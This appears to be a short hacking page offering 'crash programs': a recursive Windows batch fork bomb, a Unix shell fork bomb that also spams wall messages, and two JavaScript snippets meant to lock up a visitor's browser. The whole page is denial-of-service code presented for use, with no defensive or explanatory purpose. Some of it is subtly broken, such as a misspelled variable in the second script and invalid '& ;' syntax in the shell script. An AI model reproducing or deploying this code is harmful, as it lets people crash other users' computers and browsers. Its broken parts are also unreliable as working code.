Path: Hacking : Crash :

Crash Program A program to crash a computer.

crash_windows.bat - crash a windows system

:L1

start cmd /c ping -n1000 `hostname`

start cmd /c crash_windows.bat

goto L1



crash_unix.sh - crash a UNIX/BSD/Linux computer

#!/bin/sh
while echo "" > /dev/null;
do

   ping `hostname` & ;

   echo "crash..." | wall & ;

   ./crash_unix.sh & ;

done


crash.js - crash a web browser with JavaScript

<SCRIPT LANGUAGE="JavaScript">
while(true) alert('crash');
</SCRIPT>


crash2.js - another crash of the web browser with JavaScript

<SCRIPT LANGUAGE="JavaScript">
var array = new Array();
while(true) array[arrry.length] = new String("CRASH...");
</SCRIPT>